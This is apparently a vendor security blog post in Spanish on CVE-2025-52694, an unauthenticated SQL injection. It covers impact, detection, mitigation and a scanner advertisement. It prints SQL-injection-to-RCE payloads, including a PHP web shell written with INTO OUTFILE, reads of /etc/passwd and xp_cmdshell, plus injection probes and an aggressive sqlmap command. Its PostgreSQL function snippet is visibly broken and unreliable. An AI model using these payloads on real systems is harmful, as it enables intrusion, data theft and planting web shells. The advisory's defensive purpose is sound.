CVE CRÍTICA 12 de enero de 2026 · 10 min de lectura

CVE-2025-52694: Una inyección SQL sin autenticación permite ejecutar comandos arbitrarios en servicios expuestos

Una vulnerabilidad de inyección SQL que no requiere autenticación permite a atacantes remotos ejecutar comandos SQL arbitrarios en servicios vulnerables expuestos a Internet, lo que amenaza la confidencialidad, integridad y disponibilidad de los datos. CVSS 10.0.


CVSS 10.0 — CRÍTICA
CampoDetalle
ID de CVECVE-2025-52694
GravedadCRÍTICA (CVSS 3.1: 10.0)
Tipo de vulnerabilidadInyección SQL (CWE-89)
Publicada12 de enero de 2026
Autenticación requeridaNinguna
Vector de ataqueRed (expuesto a Internet)

¿Qué es CVE-2025-52694?

CVE-2025-52694 es una vulnerabilidad crítica de inyección SQL en un servicio expuesto a Internet que no requiere autenticación para explotarse. Los atacantes pueden inyectar comandos SQL arbitrarios directamente en las consultas a la base de datos del servicio vulnerable, lo que podría permitirles leer o modificar todo el contenido de la base de datos y, dependiendo de su configuración, ejecutar código de forma remota en el servidor subyacente.

La inyección SQL forma parte del Top 10 de OWASP desde sus inicios y sigue siendo devastadoramente eficaz cuando está presente. Una inyección SQL accesible desde la red, sin autenticación y con acceso completo a los datos representa el máximo nivel de peligro, de ahí la puntuación CVSS máxima.

Impacto técnico

⚠ Compromiso total de la tríada CIA

Confidencialidad: Todo el contenido de la base de datos puede leerse: nombres de usuario, contraseñas, información de identificación personal, claves de API y datos financieros.
Integridad: Es posible modificar datos, eliminar registros y alterar el esquema.
Disponibilidad: Posibles ataques de denegación de servicio mediante consultas que agotan los recursos y posible destrucción de datos.

Ruta de escalada de inyección SQL a RCE

En bases de datos con funciones ampliadas habilitadas, una inyección SQL puede escalar hasta la ejecución de comandos del sistema operativo:

-- MySQL con privilegio FILE: leer archivos del sistema operativo
SELECT LOAD_FILE('/etc/passwd');

-- MySQL con INTO OUTFILE: escribir shells web
SELECT '<?php system($_GET["cmd"]); ?>'
INTO OUTFILE '/var/www/html/shell.php';

-- MSSQL con xp_cmdshell habilitado
EXEC xp_cmdshell 'whoami';

-- Inyección de objetos grandes de PostgreSQL
SELECT lo_import('/etc/passwd');
CREATE OR REPLACE FUNCTION cmd(text) RETURNS text AS $
  DECLARE result text;
  BEGIN
    EXECUTE 'COPY (SELECT '') TO PROGRAM ''' ||  || '''';
    RETURN result;
  END;
$ LANGUAGE plpgsql;

Versiones afectadas

Consulte el aviso del proveedor para obtener información específica sobre el producto y las versiones. Cualquier versión indicada como afectada que esté expuesta al tráfico de Internet debe considerarse explotable activamente. Actualice de inmediato a las versiones parcheadas proporcionadas por el proveedor.

Métodos de detección

Pruebas manuales de inyección SQL

# Detección básica basada en errores
# Añada ' a los parámetros y observe las respuestas de error
GET /search?q=test' HTTP/1.1

# Detección ciega basada en booleanos
GET /search?q=test' AND 1=1-- -   # Debería devolver resultados normales
GET /search?q=test' AND 1=2-- -   # Debería devolver resultados vacíos o diferentes

# Detección ciega basada en tiempo (confirmar la inyección)
GET /search?q=test'; WAITFOR DELAY '0:0:5'-- -   # MSSQL
GET /search?q=test'; SELECT SLEEP(5)-- -          # MySQL

# Use SQLMap para confirmar automáticamente la explotación (solo en pruebas autorizadas)
sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 --dbs

Revisión de registros del WAF

Revise los registros del WAF o de la aplicación en busca de patrones que incluyan palabras clave de SQL (UNION SELECT, OR 1=1, SLEEP(, xp_cmdshell) en los parámetros de las solicitudes. La explotación activa de CVE-2025-52694 mostrará estos patrones.

🔍 Detección de KENSAI: El escáner de inyección SQL de KENSAI abarca técnicas de inyección basadas en errores, ciegas, basadas en tiempo y fuera de banda. Los patrones de inyección de CVE-2025-52694 están incluidos en nuestra biblioteca de cargas útiles y se contrastan con todos los vectores de entrada, incluidos parámetros, encabezados y campos del cuerpo JSON/XML.

Pasos de mitigación

  1. Aplique de inmediato el parche del proveedor: Actualice a la versión parcheada especificada en el aviso del proveedor.
  2. Consultas parametrizadas: Asegúrese de que todas las consultas a la base de datos utilicen sentencias preparadas con entradas parametrizadas, la única solución fiable para la inyección SQL.
  3. Validación de entradas: Valide y depure todas las entradas proporcionadas por los usuarios, rechazando los metacaracteres de SQL cuando no sean necesarios.
  4. Privilegios mínimos: Las cuentas de la base de datos deben tener los permisos mínimos necesarios; las cuentas de la aplicación nunca deben utilizar sa ni tener acceso raíz a la base de datos.
  5. Reglas del WAF: Implemente o actualice las reglas del WAF para detectar y bloquear cargas útiles de inyección SQL; se trata de un control compensatorio, no de una solución.
  6. Desactive los procedimientos almacenados peligrosos: Desactive xp_cmdshell y otras funciones de la base de datos a nivel del sistema operativo, salvo que sean estrictamente necesarias.
  7. Segmentación de red: Los servidores de bases de datos nunca deben ser accesibles directamente desde Internet.

Capacidad de detección de KENSAI

KENSAI ofrece detección integral de inyecciones SQL, incluida CVE-2025-52694:

¿Hay inyección SQL en su infraestructura?

KENSAI analiza toda la superficie de ataque de su aplicación web en busca de inyecciones SQL y más de 200 vulnerabilidades críticas adicionales. No permita que una inyección SQL se convierta en una brecha de seguridad.

Analizar gratis en busca de inyección SQL

Publicado por el equipo de investigación de seguridad de KENSAI · Más análisis de CVE

Artículos relacionados

Redirigiendo... Ruflo lanza una orquestación de agentes nativa de Claude con 28 000 estrellas, SuperMemory AI Redirigiendo...